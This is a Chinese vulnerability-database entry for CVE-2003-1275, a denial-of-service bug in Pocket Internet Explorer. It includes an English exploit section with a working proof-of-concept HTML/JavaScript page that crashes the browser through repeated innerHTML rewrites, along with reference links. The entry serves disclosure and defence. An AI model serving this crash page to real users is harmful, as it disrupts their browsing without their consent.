Microsoft Pocket Internet Explorer远程拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107146 漏洞类型 其他
发布时间 2003-01-03 更新时间 2006-01-20
CVE编号 CVE-2003-1275 CNNVD-ID CNNVD-200312-216
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/22119
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-216
|漏洞详情
PocketInternetExplorer是一款用于PocketPC上的WEB浏览器。PocketIE不正确处理部分Javascript代码,远程攻击者可以利用这个漏洞构建恶意WEB页,诱使用户访问,导致PocketIE崩溃。攻击者建立一个调用某一页面中JavaScript的object.innerHTML函数写入到页面本身的WEB页,可导致PocketInternetExplorer浏览器访问此页面时崩溃。
|漏洞EXP
source: http://www.securityfocus.com/bid/6507/info

A denial of service vulnerability has been reported for Pocket Internet Explorer (PIE). The vulnerability is due to the way some JavaScript code is interpreted by PIE.

By enticing a victim user to browse a maliciously crafted web page an attacker can cause PIE to crash. 

<html> <head>
<script language="Javascript">
function displayPage(page){
if(page=="onload"){
main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">Crash
me</a>";}
if(page=="crash"){
main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">crash!</a>";}
}
</script> </head>
<body onLoad="displayPage('onload');"> <hr> <span id="main"></span> </body> </html>
|参考资料

来源:BID
名称:6507
链接:http://www.securityfocus.com/bid/6507
来源:XF
名称:pie-javascript-objectinnerhtml-dos(11004)
链接:http://www.iss.net/security_center/static/11004.php
来源:BUGTRAQ
名称:20030103JSBugmakesitpossibletodeliberatelycrashPocketPCIE
链接:http://archives.neohapsis.com/archives/bugtraq/2003-01/0013.html
来源:NSFOCUS
名称:4145
链接:http://www.nsfocus.net/vulndb/4145